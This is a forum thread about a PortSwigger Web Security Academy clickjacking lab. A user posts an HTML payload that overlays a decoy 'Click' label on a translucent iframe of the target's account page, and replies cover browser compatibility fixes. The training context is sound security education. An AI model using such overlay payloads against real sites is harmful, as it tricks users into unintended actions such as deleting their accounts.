The Burp Suite User Forum will be discontinued on the 1st November 2024.

Burp Suite User Forum


Basic clickjacking with CSRF token protection

Jean-Maurice | Last updated: Jun 17, 2024 07:43AM UTC

I'm having trouble with this lab. When I click on 'View exploit' I have the login page coming up, of course with no 'delete' button. I'm using Burp's browser Chromium and here's my script, of course I'm changing the lab Id and keep the 'https://':

    <style>
        iframe {
            position: relative;
            width: 1000px;
            height: 1000px;
            opacity: 0.5;
            z-index: 2;
        }
        div {
            position: absolute;
            top: 470px;
            left: 70px;
            z-index: 1;
        }
    </style>
    <div>Click</div>
    <iframe src="https://YOUR-LAB-ID.web-security-academy.net/my-account"> </iframe>

I also tried with /my-account?id=wiener, for the same result. What am I doing wrong? Thanks

Ben, PortSwigger Agent | Last updated: Jun 19, 2024 05:00AM UTC

Hi Jean-Maurice, There is currently an issue with using the Clickjacking labs in conjunction with Burp's embedded browser. You should, however, still be able to use a standard version of Chrome and get these labs to work - if you try a standard version of Chrome, alongside the written solution (adapted with the specific values required for your elements to line up), does this then allow you to solve this lab?

Jack | Last updated: Jul 17, 2024 07:40PM UTC

Hi, when can you fix this? It does not work with any of the browsers. Maybe accepting the solutions could be more dynamic for these labs because nothing works (Chrome, Burp browser, Opera, Edge, Firefox, NOTHING)

Ben, PortSwigger Agent | Last updated: Jul 18, 2024 08:02AM UTC

Hi, Again, having run through this lab using a standard version of Chrome (version 126.0.6478.127) this lab still works with the written solution.

RM | Last updated: Sep 30, 2024 07:14AM UTC

I just went through the same issue getting this lab to pass on Firefox, Edge and Chrome. On a fresh Chrome install, what fixed it for me was having the "Safe Browsing" setting set to "Standard Protection". The lab will not work if "Enhanced Protection" is on. Hope this helps others.
